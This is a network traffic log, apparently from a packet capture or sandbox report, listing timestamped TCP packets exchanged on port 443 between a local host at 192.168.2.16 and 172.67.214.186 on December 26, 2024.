Dec 26, 2024 18:26:49.612137079 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.618905067 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.618927956 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.618988037 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.618993998 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.619040012 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.626102924 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.626120090 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.626173973 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.626178026 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.626229048 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.632752895 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.632769108 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.632831097 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.632834911 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.632884979 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.638988972 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.639013052 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.639065981 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.639070988 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.639096022 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.639120102 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.650547981 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.650564909 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.650625944 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.650631905 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.650691032 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.808836937 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.808854103 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.808927059 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.808931112 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.808969021 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.814994097 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.815006971 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.815073967 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.815078974 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.815090895 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.815130949 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.820097923 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.820153952 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.820171118 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.820174932 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.820228100 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.826395035 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.826409101 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.826469898 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.826474905 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.826497078 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.826514959 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.833635092 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.833655119 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.833720922 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.833725929 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.833772898 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.840327978 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.840342045 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.840419054 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.840425014 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.840468884 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.847395897 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.847414017 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.847495079 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.847521067 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.847579956 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.858432055 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.858448982 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.858521938 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.858527899 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.858572960 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.017024994 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.017055035 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.017132998 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.017139912 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.017187119 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.024162054 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.024177074 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.024245024 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.024251938 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.024308920 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.031241894 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.031255960 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.031330109 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.031336069 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.031380892 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.038399935 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.038414001 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.038487911 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.038492918 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.038516045 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.038528919 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.044713020 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.044734955 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.044790983 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.044797897 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.044840097 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.051352024 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.051371098 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.051435947 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.051441908 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.051485062 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.058609009 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.058624029 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.058698893 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.058703899 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.058743954 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.078464031 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.078479052 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.078548908 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.078553915 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.078603983 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.240572929 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.240592957 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.240669012 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.240677118 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.240720987 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.246826887 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.246843100 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.246915102 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.246922016 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.246962070 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.253912926 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.253927946 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.253993988 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.253998995 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.254050970 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.261094093 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.261110067 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.261177063 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.261183023 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.261230946 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.267514944 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.267529011 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.267591953 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.267596006 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.267636061 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.274924040 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.274936914 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.275002003 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.275007010 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.275060892 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.281196117 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.281210899 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.281277895 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.281282902 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.281322002 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.289083958 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.289098978 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.289164066 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.289169073 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.289215088 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.451157093 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.451174974 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.451261997 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.451276064 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.451380968 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.457479000 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.457526922 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.457560062 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.457565069 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.457600117 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.457619905 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.464487076 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.464503050 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.464572906 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.464576960 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.464623928 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.471678972 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.471694946 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.471760035 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.471765041 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.471803904 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.477931976 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.477946997 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.478013039 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.478018045 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.478064060 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.484638929 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.484652996 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.484731913 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.484736919 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.484780073 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.491935015 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.491949081 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.492016077 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.492022038 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.492075920 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.499303102 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.499322891 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.499377966 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.499382973 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.499409914 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.499433041 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.661648989 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.661667109 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.661744118 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.661753893 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.661808968 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.667927980 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.667943001 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.668019056 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.668025970 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.668071985 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.675033092 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.675046921 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.675117970 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.675123930 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.675179005 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.682487965 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.682502985 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.682573080 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.682578087 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.682616949 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.688798904 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.688812971 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.688885927 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.688890934 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.688930988 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.696171999 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.696186066 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.696255922 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.696261883 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.696305990 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.702552080 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.702564955 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.702636003 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.702641964 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.702698946 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.709798098 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.709811926 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.709882975 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.709887981 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.709937096 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.872690916 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.872709036 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.872802973 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.872809887 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.872859955 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.879127026 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.879143000 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.879231930 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.879236937 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.879276991 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.886257887 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.886272907 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.886354923 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.886359930 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.886405945 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.893248081 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.893263102 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.893338919 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.893343925 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.893389940 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.899684906 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.899698973 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.899789095 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.899795055 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.899843931 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.907135963 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.907157898 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.907224894 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.907229900 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.907284021 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.913400888 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.913415909 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.913486958 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.913491964 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.913538933 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.921320915 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.921335936 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.921406031 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:50.921411991 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:50.921463966 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.083002090 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.083019018 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.083096981 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.083105087 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.083153963 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.090006113 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.090022087 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.090085030 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.090090990 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.090128899 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.096736908 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.096750021 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.096827030 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.096832037 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.096869946 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.103898048 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.103914022 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.103982925 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.103988886 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.104029894 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.110919952 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.110934973 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.111004114 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.111012936 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.111054897 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.118031979 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.118046999 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.118115902 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.118120909 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.118166924 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.124996901 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.125011921 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.125080109 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.125088930 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.125138044 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.131705046 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.131720066 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.131789923 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.131795883 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.131836891 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.293946028 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.293960094 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.294069052 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.294075012 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.294118881 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.300384998 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.300400972 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.300486088 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.300491095 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.300529003 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.307403088 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.307418108 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.307487965 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.307493925 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.307534933 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.316163063 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.316178083 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.316246033 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.316250086 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.316289902 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.320923090 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.320938110 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.321011066 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.321016073 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.321055889 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.328423977 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.328438997 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.328511000 CET	49719	443	192.168.2.16	172.67.214.186
